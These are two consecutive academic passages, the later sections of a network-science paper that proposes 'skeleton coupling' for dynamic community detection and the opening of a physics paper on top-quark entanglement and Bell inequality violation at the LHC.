(Infomap) as a function of the edge threshold value, \(T\). Here, we will now fix \(\gamma\) and \(\rho\) and instead explore the effects of incorporating four different interlayer coupling strategies: uniform diagonal coupling, diagonal coupling with local updates, neighborhood coupling, and our newly proposed skeleton coupling. In each case, we explore the performance of the algorithm as a function of the interlayer edge weight, \((T,\omega)\), and edge threshold value value, \(T\). As before, we compare algorithm performance for two distinct types of community evolution scenarios: a monotonic series of community events in which an initial community expands over time until the whole network is synchronized, and a non-monotonic event in which _transient communities_ appear/disappear over time. We now show how incorporating the use of skeleton coupling into the design of networks results in improved performance of temporal carryover for both MMM and Infomap algorithms. ### Influence of skeleton coupling with MMM We first compare the performance of MMM under different interlayer coupling strategies. In Fig. 5(A), we present the results of using uniform diagonal coupling and diagonal coupling with local updates for an expanding community. Below the NMI plots, we show the community evolution plots of both optimal and non-optimal parameter choices. Observe that both coupling techniques yield structurally similar results, failing to identify the expanding community and instead carry over the independent community labels. This result is true for both optimal and non-optimal choices of coupling parameters. Next, we study non-diagonal coupling approaches using neighborhood coupling and skeleton coupling. Notice that both of these non-diagonal approaches succeed in detecting the expanding planted dynamic community. However, neighborhood coupling fails to temporally carry over the singleton communities, assigning a different community label to each node at every layer, resulting in a total of 235 communities. On the other hand, skeleton coupling correctly carries over the singleton communities and results in a total number of detected communities that is within reasonable range of the ground truth. We also see an overall improvement in the performance of the algorithm for non-optimal parameter regions: parameter regions that are near optimal (yellow boxes) can partially recover the expanding community correctly. In Fig. 5(B), we next examine the performance of different coupling strategies in correctly detecting transient communities in the data. Notice that both diagonal coupling strategies perform relatively well in finding planted _transient communities_ within a layer. However, while some singleton community labels are correctly temporally carried between layers, the diagonal coupling strategies perform poorly in correctly carrying over the transient community labels between snapshots. When using non-diagonal coupling strategies, we observe that by both neighborhood coupling and skeleton coupling perform well in correctly detecting and carrying over transient community labels. However, neighborhood coupling performs poorly at correctly carrying over independent community labels which results in a high number of total detected communities. Skeleton coupling results in not only correctly detecting and carrying over transient communities, but is also able to correctly carry over independent community labels, resulting in higher performance values. Overall, skeleton coupling outperforms the other coupling heuristics when combined with MMM for both community evolution scenarios. ### Influence of skeleton coupling with Infomap In Fig. 6, we show the performance of the four different coupling strategies when combined with the Infomap algorithm for the same data as in Fig. 5. Observe that in Fig. 6(A), for the expanding community, both diagonal coupling techniques seem to fail correctly detecting the neurons contained in the first a few snapshots of the temporal network as part of the expanding community, possibly due to the number of snapshots in the temporal network. However, these coupling schemes perform fairly well at capturing the temporal carry over of singleton community labels. For the case of the non-diagonal coupling schemes, both non-diagonal approaches correctly identify the expanding community. However, neighborhood coupling fails to temporally carry over the singleton communities, assigning each node a different community label in every layer. In contrast, skeleton coupling correctly detects the temporal carryover of singleton communities, Figure 5: **Comparison of different interlayer coupling strategies for MMM.** Comparison of different interlayer coupling heuristics for \(N=78\) neurons undergoing **A.** expanding community events with 63 total community labels and **B.** transient community events with a total of 141 community labels. Community labels are depicted by color. Parameter landscapes show algorithm performance measured by the NMI in the \((T,\omega)\) parameter space. The configuration model was chosen as the null model and the resolution parameter was equal to \(0.94\) for the expanding events in A and \(1.46\) for transient events in B. Under each parameter space, we illustrate _example partitions_ found by the MMM algorithm within the bounds of optimal and non-optimal regions highlighted by green, yellow and blue rectangles, in the order of descending NMI, respectively. resulting in a relatively good match between the detected evolution of communities and the ground truth. In Fig. 6(B), we explore the performance of the coupling strategies to detect transient communities in the data. Interestingly, when combined with the Infomap algorithm, diagonal coupling approaches perform very poorly, failing to identify the communities in each layer. Further, the use of these coupling strategies results in a tendency for the community labels of all nodes, regardless of whether they belong to a singleton or a larger community to be carried over. On the other hand, we again find that non-diagonal coupling approaches perform better than diagonal coupling, as indicated by the NMI values (darker shade of red). Indeed, example partitions show that both neighborhood coupling and skeleton coupling correctly identify the planted _transient communities_. However, neighborhood coupling fails to temporally carry over singletons (similar to Fig. 6(A)), increasing the total community labels. Similarly, skeleton coupling correctly performs temporal carry overs of singleton communities and shows a high correlation between the detected community evolution and ground truth. ## VII Discussion Real-world complex systems exhibit dynamical behavior in which the state of the system changes over time. Subsequently, temporal networks and dynamic community detection (DCD) can be used to assess the evolution of network communities. Here, we examined 5 different DCD algorithms and showed that current methods for these algorithms fail in data with many singleton communities and transient events. We also found that algorithms that employed interlayer edge coupling strategies (MMM and Infomap) performed better at identifying singleton communities. Further, the use of non-diagonal coupling strategies additionally resulted in superior temporal carryover of community assignments. We therefore developed a novel non-diagonal interlayer coupling scheme that we call _skeleton coupling_, which incorporates the temporal neighborhood history encoded in Figure 6: **Comparisons of different interlayer coupling strategies for Infomap.** Comparison of different interlayer coupling heuristics for \(N=78\) neurons undergoing **A.** expanding community events with 63 total community labels and **B.** transient community events with a total of 141 community labels. Community labels are depicted by color. Parameter landscapes show algorithm performance measured by the NMI in the \((T,\omega)\) parameter space. The multilayer relax rate was set to \(0.2\) in both panels. Under each parameter space, we illustrate _example partitions_ found by the MMM algorithm within the bounds of optimal and non-optimal regions highlighted by green, yellow and blue rectangles, in the order of descending NMI, respectively. the adjacent previous network states in order to algorithmically determine the placement of interlayer edges. Skeleton coupling outperformed existing interlayer coupling schemes by correctly temporally carrying over both singleton and large community labels in synthetically generated data. Skeleton coupling builds upon the idea that singleton communities are topologically different than larger size communities. We think of dynamic communities as 1-skeletons (or cliques of partitions) independent of their connectivity in the network. In other words, given a partition of a network into communities, the 1-skeleton of a community is the fully connected subnetwork nodes which doesn't have any other outside connections, discretizing the communities from the rest of the network. Since a singleton community i.e., a 0-skeleton, does not have any edges within, it cannot have a 1-skeleton, whereas a larger size community containing edges between the members of the community can have at least 1-skeleton. Therefore, a 0- and 1-skeleton are topologically different, and they have to be coupled differently. By considering the time evolution of skeletons of communities on a temporal network, skeleton coupling algorithmically links connected components of temporal networks, which corresponds to assigning interlayer edges in the discretized versions of communities in the skeleton representation. The development of novel non-diagonal coupling schemes is also motivated by the fact that when diagonal coupling schemes are used, the importance of selecting the proper edge weight, threshold, and DCD algorithm can be additionally complicated. In our parameter space plots of Figs. 5 and 6, we can make a general observation that the value of the interlayer edge weight seems less important than the value of threshold parameter, as seen by the similar color value of the NMI that extends vertically throughout the plots. In fact, when comparing Figs. 5A and B using the MMM algorithm, it is clear that the optimal threshold parameter is highly dependent on the type of community event for the diagonal coupling schemes. This effect is much less pronounced for the non-diagonal coupling schemes. We again see a similar effect when looking at the performance of Infomap in Fig. 6. Here, for diagonal coupling schemes, we again see differences in the regions of optimal parameters between panels A and B. Interestingly, there is also more dependence on the choice of edge weight for diagonal coupling schemes used with Infomap. Further, when employing non-diagonal coupling schemes (neighborhood and skeleton), the optimal regions in Figs. 5 and 6 exhibit a much stronger NMI which extends along the entire parameter space (vertically) for both expanding and transient community events, and this observation is independent of the choice of DCD algorithm. This finding suggests that non-diagonal linking schemes such as skeleton coupling can be used as a dimensionality reduction technique since the choice of optimal parameters is less dependent on the interlayer coupling edge weight, \(\omega\), type of community event, and choice of algorithm. While non-diagonal coupling schemes show many advantages, one drawback of skeleton coupling is the computational cost of the given framework. In order to take advantage of skeleton coupling, one needs to apply static community detection to individual snapshots, as skeleton coupling utilizes the static community information in order to determine interlayer edges. This means that the static version of the DCD algorithm needs to run multiple times before running the DCD algorithm on the full temporal network, which clearly increases the computational complexity. However, on short-stacked temporal networks (low number of snapshots), the time consumption of the algorithm is not problematic given that the accuracy of the DCD algorithm is drastically improved. Finally, we note that the same idea of skeleton coupling can be extended further to higher-order skeletons. For example, a community of size 2 is also topologically different than a community of size 3 and more, as the size 2 community can at most have a 1-skeleton, whereas the larger community can have at least a 2-skeleton which corresponds to the filled in triangles in the corresponding simplicial complex. In general, community sizes and dimensions of the associated skeletons are correlated and a community of size \(k\) can have at most a \((k-1)\)-skeleton, which distinguishes it from larger size communities. Within our presented framework, additionally utilizing higher-order skeletons to select interlayer edges would result in the addition of subcases of the _'case iv'_ section of the presented algorithm. We anticipate that incorporating higher-order skeletons would improve the performance of DCD algorithms by introducing greater differences in topological coupling between layers. However, here, we only focus on skeletons up to dimension 1 due to the previously discussed computational concerns. In summary, this work fills an important gap in the literature by comparing and contrasting various DCD algorithms and their optimal hyperparameters for performing community detection in temporal networks. In real-world data where the ground truth community structure and evolution is not known, understanding how network construction and choice of DCD algorithm affects the outcome of the detected community evolution is essential. In data sets with expected singleton and transient communities, we therefore recommend the use of non-diagonal coupling strategies such as skeleton coupling to improve algorithm performance and provide more accurate representation of community evolution. ## VIII Methods ### Code and Data availability Code for the implementation of skeleton coupling can be found at [40] and an accompanying documentation for this codebase can be found at [41]. ### DCD algorithms #### iii.2.1 Multilayer modularity maximization (MMM) Modularity assesses partition quality based on a comparison between the connectivity of nodes within a community and between communities, relative to what would be expected in a null model [17]. In our case, communities within layers are compared to the configuration model [42] by utilizing the Leiden solver [43] (instead of commonly used Louvain algorithm [44]). In Fig.2, We explored algorithm performance as a function of the edge threshold and resolution parameter, \((T,\gamma)\). For this analysis, all calculations were performed assuming uniform diagonal coupling with interlayer edge weight \(\omega=0.1\). For the analysis in Fig.5, we selected the optimal interlayer edge weight found from the analysis done in Fig.2 (Fig.5A, \(\gamma=0.94\); Fig.5B, \(\gamma=1.46\)) and fixed this parameter in order to explore the \((T,\omega)\) parameter space for different interlayer coupling configurations. #### iii.2.2 Infomap Infomap determines community structure based on the visiting times of nodes by random walkers via the map equation [35; 18]. We used the python API [19] with a directed flow model and optimized a two-level partition in order to run our analyses. We explored algorithm performance as a function of the edge threshold and multilayer relax rate, \((T,\rho)\). For this analysis, all calculations were performed assuming uniform diagonal coupling with interlayer edge weight \(\omega=0.1\). For the analysis in Fig.5, we selected the optimal multilayer relax rate found from the analysis done in Fig.2 (Fig.5A and B, \(\rho=0.2\)) and fixed this parameter in order to explore the \((T,\omega)\) parameter space for different interlayer coupling configurations. #### iii.2.3 Dynamic stochastic block model (DSBM) Stochastic block models determine community structure by trying to fit generative models to known properties of the data [20; 21]. In our experiments, we utilized _LayeredBlockState_ in the graph-tool API [45] with overlapping model and edge covariates chosen as'real-exponential' [20]. We ran our analyses with and without degree correction \(\Delta\) (1 and 0, respectively), which we included in \((T,\Delta)\) parameter spaces as two different rows in Fig.2. #### iii.2.4 Dynamic plex propagation method (DPPM) Dynamic plex propagation method is a generalization of the clique percolation method (CPM) [46]. DPPM relaxes the condition on the definitions of communities, which were \(n\)-cliques in CPM, into \(k\)-plexes on \(n\) nodes [22]. The algorithm runs on individual layers of the network to find the topologically clustered plexes used to define static communities. These community labels are then separately carried over across snapshots for mapping and matching. We used \(n=k+2\) in our analyses for \(k=2,3\) as indicated in the rows of the \((T,k)\) parameter space shown in Fig.2. We additionally note that one major drawback of the algorithm is its computational complexity which limited the use of this algorithm in our experiments. #### iii.2.5 Tensor Factorization Tensor factorization determines community structure by approximating the bases of a vector space corresponding to the temporal network. The algorithm takes the desired number of communities, \(\eta\) as input, however, this quantity is usually not known in real-world data [23]. We therefore explore the \((T,\eta)\) parameter spaces in Fig.2. We used a random initialization of the factorization of the tensors with 500 iterations. We averaged the first two factors (x,y-dimensions of the tensors) and multiplied it by the third dimension (time axis) of the basis elements in order to obtain community labels. ### Synthetic Data Generation We simulated neuronal activity of a population of \(N=78\) synthetic neurons using a homogeneous Poisson process. Similarity between firing patterns of neurons was assessed using the the pairwise maximum cross-correlation between neurons, meaning that the goal of performing DCD on this data set was to detect groups of neurons with similar firing patterns. To create a temporal network from the time-series data in our experiments, we used window-size of \(\tau=1000\)ms and \(t_{max}=6\) to create snapshots (layers) of the network. In order to simulate monotonically growing communities, a master spike train of length \(t_{max}\times\tau\) was generated with a randomly selected spike rate and jittered \(\pm 5\)ms to create the master community. The size of the master community was randomly selected from different distributions (uniform, gaussian or exponential) in order to ensure robust results. Next, at every \(1000\)ms, we generated independent spike trains of a given size (from the same distribution as the master) that synchronized their spiking activity with the master community (again by jittering the master spike train). This process lead to singleton communities joining the master community at every time window. For non-monotonic events, we input number of communities we desired at each snapshot into our time-series generating pipeline. Within each layer, we created master spike trains that were jittered to generate the associated community. Then we'spaced' these communities by generating independently firing spike trains. As a result, in each layer, we had \(N\) neurons where some were distributed into communities and some were singletons. If communities in adjacent layers intersected more than \(50\%\), we assigned them the same dynamic community label. After generating time series for both monotonic and non-monotonic community events, we divided the time series into windows of length \(\tau=1000\). We computed the pairwise maximum cross-correlation in each window to build snapshot representations of temporal networks that represent the underlying planted community structure. Finally, before applying any DCD algorithms, we padded the first and the last layers of every snapshot by the first and last static snapshot to avoid end point issues. Note that the community partitions in the padded layers was discarded after the algorithm was run. ### Interlayer coupling #### v.4.1 Uniform diagonal coupling Uniform diagonal coupling was performed by adding undirected interlayer links between a node and itself in adjacent snapshots i.e. for every node \(\sigma_{\alpha}^{t}\in V\) where \(t\in\{1,2,..,t_{max}-1\}\), we assign an interlayer edge of constant weight \(\omega\), \((\sigma_{\alpha}^{t},\sigma_{\alpha}^{t+1})\). #### v.4.2 Diagonal coupling with local updates Diagonal coupling with local updates is topologically the same heuristic as diagonal coupling, but in this case, the interlayer edge weights \(\omega_{\alpha}\) are allowed to vary. Given a constant edge weight \(\omega\), \(\omega_{\alpha}\) is equal to \(\omega.s\) if the change between nodal attribute at layer G\({}_{t}\) and G\({}_{t+1}\) is less than (or equal to) \(y\) standard deviations, and is equal to \(\omega\) if it is greater than \(y\) standard deviations as described in [38]. We use firing rate as our nodal attribute and take \(s=\frac{1}{100}\) and \(y=0.5\) in our experiments. #### v.4.3 Neighborhood coupling For neighborhood coupling, we determine a neighborhood of a node \(\sigma_{\alpha}^{t}\) where \(t\in\{1,2,..,t_{max}-1\}\) based on the strength of intralayer edges of \(\sigma_{\alpha}^{t}\). We sort all the neighbors of \(\sigma_{\alpha}^{t}\), \(\mathsf{N}_{\alpha}^{t}\), in descending order of connection strength and take only the first \(p\%\) of these neighbors \(\{\sigma_{\beta}^{t+1}\}_{\beta\in\mathsf{N}_{\alpha}^{t}}\) as the set of maximal neighbors which we couple with \(\sigma_{\alpha}^{t}\) assigning uniform edge weights \(\omega\), where \(p=10\). We followed a similar protocol as described in [39] for normalizing the weights of outlinks and using Jensen-Shannon divergence, but we only couple nodes that are in adjacent snapshots. ### Optimal regions We determine the optimal regions of algorithm parameters by taking the argmax of the maximal normalized mutual information (NMI) within the parameter planes, \((T,\cdot)\). The corresponding _example partitions_ are then shown for this parameter set. Although the same maximum value can occur at multiple \((T,\cdot)\) pairs, we only display one example partition since different maximal example partitions generally do not differ structurally. In Figs.5 and 6, we choose the non-optimal regions by keeping the interlayer edge weight, \(\omega\), the same and varying the intralayer edge threshold, \(T\). ### Evaluating partition quality We compare the performance of dynamic community detection algorithms with respect to a ground truth which we consider to be our planted community labels. Note that because different DCD algorithms use different definitions of the optimal com munity, we expect expect that different algorithms will detect different community partitions. Additionally, when applying DCD algorithms to real-world data, there is no known ground truth for comparison [47] which is why we explore synthetic data sets with different planted community evolution. Importantly, however, when exploring different interlayer coupling strategies, we are making comparisons about algorithm performance within a single DCD algorithm, meaning that we are measuring quantifiable insights about differences in algorithm performance as a function of interlayer coupling independently of the quality function used by the algorithm. We measure the similarity between true community labels \(U\) and predicted community labels \(V\) by calculating the _normalized mutual information_ (NMI) [36; 37]: \[NMI(U,V)=\frac{I(U,V)}{max(H(U),H(V))} \tag{1}\] where \(H(\cdot)\) is the entropy and \(I(\cdot,\cdot)\) is the mutual information which we choose to normalize by the maximum entropy of the labels since this approach works better with overlapping communities [48]. In addition, we illustrate the results in which we measure the quality of the partition by other metrics (ARI, NVI and Jaccard index) in Supplementary Material 'Partition quality metrics'. ## IX Acknowledgment This work was supported by the National Science Foundation (SMA-1734795 to S.F.M.).
2310.17696
Quantum Entanglement and Bell Inequality Violation in Semi-Leptonic Top Decays
Quantum entanglement is a fundamental property of quantum mechanics. Recently, studies have explored entanglement in the $t\bar{t}$ system at the Large Hadron Collider (LHC) when both the top quark and anti-top quark decay leptonically. Entanglement is detected via correlations between the polarizations of the top and anti-top and these polarizations are measured through the angles of the decay products of the top and anti-top. In this work, we propose searching for evidence of quantum entanglement in the semi-leptonic decay channel where the final state includes one lepton, one neutrino, two $b$-flavor tagged jets, and two light jets from the $W$ decay. We find that this channel is both easier to reconstruct and has a larger effective quantity of data than the fully leptonic channel. As a result, the semi-leptonic channel is $60\%$ more sensitive to quantum entanglement and a factor of 3 more sensitive to Bell inequality violation, compared to the leptonic channel. In $139~{\rm fb}^{-1}$ ($3~{\rm ab}^{-1}$) of data at the LHC (HL-LHC), it should be feasible to measure entanglement at a precision of $\lesssim 3\%\ (0.7\%)$. Detecting Bell inequality violation, on the other hand, is more challenging. With $300~{\rm fb}^{-1}$ ($3~{\rm ab}^{-1}$) of integrated luminosity at the LHC Run-3 (HL-LHC), we expect a sensitivity of $1.3\sigma$ ($4.1 \sigma$). In our study, we utilize a realistic parametric fitting procedure to optimally recover the true angular distributions from detector effects. Compared to unfolding this procedure yields more stable results.
Tao Han, Matthew Low, Tong Arthur Wu
2023-10-26T18:00:02Z
http://arxiv.org/abs/2310.17696v1
# Quantum Entanglement and Bell Inequality Violation in Semi-Leptonic Top Decays ###### Abstract Quantum entanglement is a fundamental property of quantum mechanics. Recently, studies have explored entanglement in the \(t\bar{t}\) system at the Large Hadron Collider (LHC) when both the top quark and anti-top quark decay leptonically. Entanglement is detected via correlations between the polarizations of the top and anti-top and these polarizations are measured through the angles of the decay products of the top and anti-top. In this work, we propose searching for evidence of quantum entanglement in the semi-leptonic decay channel where the final state includes one lepton, one neutrino, two \(b\)-flavor tagged jets, and two light jets from the \(W\) decay. We find that this channel is both easier to reconstruct and has a larger effective quantity of data than the fully leptonic channel. As a result, the semi-leptonic channel is 60% more sensitive to quantum entanglement and a factor of 3 more sensitive to Bell inequality violation, compared to the leptonic channel. In 139 fb\({}^{-1}\) (3 ab\({}^{-1}\)) of data at the LHC (HL-LHC), it should be feasible to measure entanglement at a precision of \(\lesssim 3\%\) (0.7%). Detecting Bell inequality violation, on the other hand, is more challenging. With 300 fb\({}^{-1}\) (3 ab\({}^{-1}\)) of integrated luminosity at the LHC Run-3 (HL-LHC), we expect a sensitivity of 1.3\(\sigma\) (4.1\(\sigma\)). In our study, we utilize a realistic parametric fitting procedure to optimally recover the true angular distributions from detector effects. Compared to unfolding this procedure yields more stable results. ## 1 Introduction Quantum Mechanics -1 Review -2 Entanglement -2.3 Bell Inequality Violation The Top-Antitop System at Hadron Colliders -3.1 Two-Body Production at Hadron Colliders -3.2 The \(t\bar{t}\) System as a Quantum State -3.3 Spin Analyzing Power -3.4 Entanglement in \(t\bar{t}\) -3.5 Bell Inequality Violation in \(t\bar{t}\) Results at the LHC -4.1 Sketch of Expected Results -4.2 Simulation -4.3 Unfolding and Parametric Fitting -4.4 Signal Regions -4.5 Entanglement Results -4.6 Bell Inequality Violation Results Summary and ConclusionsA Unfolding and Parametric FittingA.1 UnfoldingA.2 Parametric FittingB Comparison to Previous ResultsC Spin Analyzing Power for Hadronic Top DecaysD Quantum versus Fictitious StatesE Charm Tagging Introduction Quantum mechanics is at the foundation of modern physics. One of the novel features of a quantum mechanical system is that it can exhibit entanglement between sub-systems. Entanglement is a correlation between sub-systems where properly describing one sub-system requires knowledge of the other sub-system, even when the sub-systems are space-like separated. Another landmark in the understanding of quantum mechanics was the discovery of Bell inequalities [1]. These are inequalities that are satisfied in any classical theory or, more generally, in any local theory that can include hidden variables. Violations of Bell inequalities, so-called Bell non-localities, indicate that a local classical theory cannot be used to describe these phenomena. Observations of violations of Bell inequalities are among the strongest experimental evidence for quantum mechanics. High energy particle colliders fundamentally rely on quantum field theory for their quantitative description and aspects of quantum mechanics are observable throughout the theoretical and experimental landscape. For instance, interference effects in production cross sections and detection methods for particles rely on quantum mechanics, while precision physics depends on higher-order quantum corrections from all relevant energy scales. In recent work, the final state in a collider is cast as a system of two qubits which allows us to perform a number of experiments using this system. Treating the outgoing particles at a collider as a quantum state is a novel experiment that measures and tests quantum mechanics in an unprecedented high-energy regime, many orders of magnitude in energy above conventional quantum experiments. Adapting to the collider environment presents interesting challenges as there is much less control over the experimental set-up. On the other hand, at a collider there is an enormous amount of data collected, a wide range of kinematics and energies are explored, and effects that are enhanced at higher energies, like higher dimensional operators, may be visible [2; 3]. Recently, there has been a growing body of work on the \(t\bar{t}\) system as a quantum state. First, it was shown that in the fully leptonic channel, where both the top and the anti-top decay leptonically, entanglement could be measured at the Large Hadron Collider (LHC) when only events near threshold are used [4]. Initially, it was predicted that Bell inequality violation, using the same spin correlation observables, could be probed at the high luminosity LHC (HL-LHC) [5]. However, subsequent studies found the expected significance to be less than \(2\sigma\) when unbiased observables are used [6]. Ref. [7] noted that one could use expectation values of spin correlations rather than spin correlations themselves to identify entanglement and Bell inequality violation. Additional significance may be gained by directly measuring an observable sensitive Bell inequality violation, rather than first reconstructing the quantum state and then computing observables from it [8]. Beyond Bell inequality violation, other quantum properties can be studied in the \(t\bar{t}\) system like quantum steering and quantum discord [9]. The issue of spin correlations at colliders is a well-studied topic. The \(t\bar{t}\) system, in particular, has been studied since before the LHC era [10; 11; 12; 13; 14; 15]. What is new in the current iteration of work is carefully casting the \(t\bar{t}\) system into a quantum state rather than just correlations between two spins. This allows us to make quantitative statements about the quantum aspects of the \(t\bar{t}\) system. In this work, we continue the study of the \(t\bar{t}\) final state, but instead of studying the leptonic channel, we consider the semi-leptonic channel where either the top or anti-top decays leptonically and the other decays to a light quark and anti-quark. One of the nice features of the top (or anti-top) decaying leptonically is that the lepton (or anti-lepton) carries the maximal amount of information about the top polarization. In hadronic decays, some of that information is typically lost. On the other hand, the branching fraction to the semi-leptonic channel is much higher, roughly about a factor of six, so the effective amount of data collected is larger. Combining the more favorable kinematical reconstruction, we find that the semi-leptonic channel is expected to be more sensitive. While finalizing this work, Ref. [16] presented a study on the semi-leptonic decay of \(t\bar{t}\) using unfolding and machine learning for reconstruction. Our work is complementary as we show that choosing an appropriate signal region is impactful and we focus on providing intuition through each stage as well as the theoretical underpinnings. Instead of unfolding, we utilize parametric fitting. In addition to the \(t\bar{t}\) system, there have been studies on quantum properties of other systems at colliders. These include entanglement between two vectors [17; 18; 19; 20] including production from \(h\to VV\)[21; 22; 23; 24; 25; 26] and vector boson fusion [27], between \(W\) and \(t\)[28], between \(\tau^{+}\) and \(\tau^{-}\)[29; 30], between \(B\)-mesons [31], and others [32]. Implications for higher dimensional operators have been explored [2; 3], as have other quantum properties like discord and steering [9].1 Footnote 1: This was also studied in the 1990’s for \(e^{+}e^{-}\to\tau^{+}\tau^{-}\)[33; 34; 35]. In Sec. 2.3 we reconcile these past works with our work. The rest of the paper is organized as follows. In Sec. 2, we review the basics of quantum mechanics with an emphasis on entanglement and Bell inequality violation. We discuss the general features and the quantum mechanical aspects of the \(t\bar{t}\) system for production and decay at hadron colliders in Sec. 3. The results of our analysis on the sensitivity to test entanglement and Bell inequality violation in the \(t\bar{t}\) system at the LHC are presented in Sec. 4. In Sec. 5, we summarize our study, compare with the existing literature, and draw our conclusions. Some technical aspects of our treatment are included in a few appendices, including a description of different unfolding methods and parametric fitting in Appendix A, numerical comparisons with past works in Appendix B, a presentation of the spin analyzing power for hadronic top decays in Appendix C, a discussion on the fictitious states adopted for detecting entanglement and Bell inequality violation at collider in Appendix D. Finally, the potential of charm tagging is covered in Appendix E. Quantum Mechanics In this section we first review a few relevant aspects of quantum mechanics, then we discuss entanglement and Bell inequalities. ### Review Consider a bipartite system of two qubits. There is one qubit \(|\psi_{\mathcal{A}}\rangle\) from sub-system \(\mathcal{A}\) and one qubit \(|\psi_{\mathcal{B}}\rangle\) from sub-system \(\mathcal{B}\). These states are vectors in the Hilbert spaces \(\mathcal{H}_{\mathcal{A}}\) and \(\mathcal{H}_{\mathcal{B}}\), respectively. The bipartite state is a vector in the Hilbert space \(\mathcal{H}_{\mathcal{A}}\otimes\mathcal{H}_{\mathcal{B}}\). A density matrix \(\rho\) is a non-negative operator on Hilbert space. For a state vector \(|\psi\rangle\), the associated density matrix is the projection operator \(\rho=|\psi\rangle\langle\psi|\). We will often call \(\rho\) itself a quantum state associated with the state vector \(|\psi\rangle\). After choosing a basis, \(\rho\) for a bipartite qubit state can be written as a \(4\times 4\) positive semi-definite matrix. The density matrix formalism is required because it allows us to describe mixed states where state vectors restrict us to pure states. A mixed state is generically written as \[\rho_{\rm mixed}=\sum_{a=1}^{N}p_{a}\rho_{a},\qquad\quad\sum_{a=1}^{N}p_{a}=1, \tag{1}\] where \(p_{a}\) is the fraction of the ensemble for the sub-state \(a\). The case of \(N=1\) is a pure state, otherwise, it is a mixed state. In our application to the \(t\bar{t}\) system, we will be dealing with a mixed state. For a single qubit, the density matrix can be described by the Pauli decomposition \[\rho=\frac{1}{2}\Big{(}\mathbb{I}_{2}+\sum_{i}B_{i}\sigma_{i}\Big{)}, \tag{2}\] where \(\sigma_{i}\) (\(i=1,2,3\)) are the Pauli matrices and \(B_{i}\) are the corresponding vector components describing the net polarization of the qubit. A bipartite qubit system follows the Pauli decomposition in a similar way \[\rho=\frac{1}{4}\Big{(}\mathbb{I}_{4}+\sum_{i}\big{(}B_{i}^{\mathcal{A}}\;( \sigma_{i}\otimes\mathbb{I}_{2})+B_{i}^{\mathcal{B}}\;(\mathbb{I}_{2}\otimes \sigma_{i})\big{)}+\sum_{i,j}C_{ij}\;(\sigma_{i}\otimes\sigma_{j})\Big{)}. \tag{3}\] For a general state, there are \(3+3+9=15\) degrees of freedom from the vectors \(B_{i}^{\mathcal{A}}\) and \(B_{i}^{\mathcal{B}}\), and the matrix \(C_{ij}\). The \(B_{i}^{\mathcal{A}}\) vector is the net polarization of spin \(\mathcal{A}\), the \(B_{i}^{\mathcal{B}}\) vector is the net polarization of spin \(\mathcal{B}\), and \(C_{ij}\) is the spin correlation matrix between sub-systems \(\mathcal{A}\) and \(\mathcal{B}\). In many cases of interest, some of these parameters are zero by symmetry. Determining all the parameters \(\{B_{i}^{\mathcal{A}},B_{j}^{\mathcal{B}},C_{ij}\}\) implies that \(\rho\) can be reconstructed, which is known as quantum tomography. Once the quantum state \(\rho\) has been measured, the expectation value of any observable \(\mathcal{O}\) can be computed as \[\langle\mathcal{O}\rangle=\mathrm{tr}(\mathcal{O}\rho). \tag{4}\] For instance, the net polarization of qubit \(\mathcal{A}\) corresponds to the operator \(\mathcal{O}=\sigma_{i}\otimes\mathbb{I}_{2}\). By Eqs. (3) and (4), this is \(\langle\sigma_{i}\otimes\mathbb{I}_{2}\rangle=B_{i}^{\mathcal{A}}\). ### Entanglement Consider a state \(\rho\) for a bipartite system with sub-systems \(\mathcal{A}\) and \(\mathcal{B}\). This state is separable if it can be written as a factorized product \[\rho=\sum_{a=1}^{N}p_{a}\ \rho_{a}^{\mathcal{A}}\otimes\rho_{a}^{\mathcal{B}}. \tag{5}\] If it cannot be written in this separable factorized form, it is entangled. This means that sub-system \(\mathcal{A}\) cannot be fully described without knowledge of sub-system \(\mathcal{B}\). For a pure state, \(N=1\) and \(p_{1}=1\). Given a state \(\rho\) there are different ways to determine if \(\rho\) describes an entangled or a separable state. We choose to use the Peres-Horodecki criterion, also called the positive partial transpose (PPT) criterion [36; 37]. The PPT criterion performs the transpose on sub-system \(\mathcal{B}\) and leaves sub-system \(\mathcal{A}\) unmodified leading to a matrix \(\rho^{T_{\mathcal{B}}}\) where \[\rho^{T_{\mathcal{B}}}=(\mathbb{I}_{2}\otimes T_{\mathcal{B}})\rho. \tag{6}\] The matrix \(\rho^{T_{\mathcal{B}}}\) may or may not be a state. For a separable, unentangled state \(\rho_{\mathrm{sep}}\), the associated \(\rho_{\mathrm{sep}}^{T_{\mathcal{B}}}\) can be written as \(\sum_{a}p_{a}\ \rho_{a}^{\mathcal{A}}\otimes(\rho_{a}^{\mathcal{B}})^{T}\), which corresponds to a valid state. For an entangled state \(\rho_{\mathrm{ent}}\), however, the associated \(\rho_{\mathrm{ent}}^{T_{\mathcal{B}}}\) is no longer a state. In general, a matrix is a valid state if all of its eigenvalues are \(\geq 0\), or equivalently stated, the matrix is positive semi-definite. The PPT criterion leads to a list of inequalities, the violation of any of these inequalities is a sufficient, but not necessary condition for entanglement. Thus, using the PPT criterion to show entanglement requires just finding a single inequality that isn't satisfied, while showing separability requires checking a set of inequalities. Concretely, expanding a quantum state \(\rho\) according to Eq. (3) allows us to write the conditions in terms of elements of the spin correlation matrix \(C_{ij}\). The quantum state \(\rho\) is \[\rho=\frac{1}{4}\left(\begin{array}{cccc}1+B_{3}^{4}+B_{3}^{8}+C_{33}&B_{1} ^{8}+C_{31}-i(B_{2}^{8}+C_{32})&B_{1}^{4}+C_{13}-i(B_{2}^{4}+C_{23})&C_{11}-C_ {22}-i(C_{12}+C_{21})\\ B_{3}^{8}+C_{31}+i(B_{3}^{8}+C_{32})&1+B_{4}^{4}-B_{3}^{8}-C_{33}&C_{11}+C_{22}+ i(C_{12}-C_{21})&B_{4}^{4}-C_{13}-i(B_{2}^{4}-C_{23})\\ B_{1}^{8}+C_{13}+i(B_{2}^{8}+C_{23})&C_{11}+C_{22}-i(C_{12}-C_{21})&B_{3}^{8}+B _{3}^{8}-C_{33}&B_{1}^{8}-C_{31}-i(B_{2}^{8}-C_{32})\\ C_{11}-C_{22}+i(C_{12}+C_{21})&B_{1}^{4}-C_{13}+i(B_{2}^{8}-C_{23})&B_{1}^{8}-C_ {31}+i(B_{2}^{8}-C_{32})&1-B_{3}^{4}-B_{3}^{8}+C_{33}\end{array}\right), \tag{7}\] and the matrix \(\rho^{T_{\mathcal{B}}}\) is \[\rho^{T_{\mathcal{B}}}=\frac{1}{4}\left(\begin{array}{cccc}1+B_{3}^{4}+B_{3 